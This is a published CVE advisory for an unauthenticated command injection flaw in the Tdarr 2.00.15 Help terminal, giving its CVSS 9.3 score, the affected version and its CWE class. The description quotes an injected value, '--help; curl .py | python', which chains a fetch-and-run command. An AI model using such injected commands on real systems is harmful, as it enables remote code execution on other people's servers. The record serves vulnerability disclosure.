CVE-2022-50919 PUBLISHED

Tdarr 2.00.15 - Command Injection

Assigner: VulnCheck
Reserved: 11.01.2026 Published: 13.01.2026 Updated: 05.03.2026

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like --help; curl .py | python to execute remote code without authentication.

Metrics

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVSS Score: 9.3

Product Status

Vendor Tdarr
Product Tdarr
Versions
  • Version 2.00.15 is affected

Credits

  • Sam Smith finder

References

Problem Types

  • Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE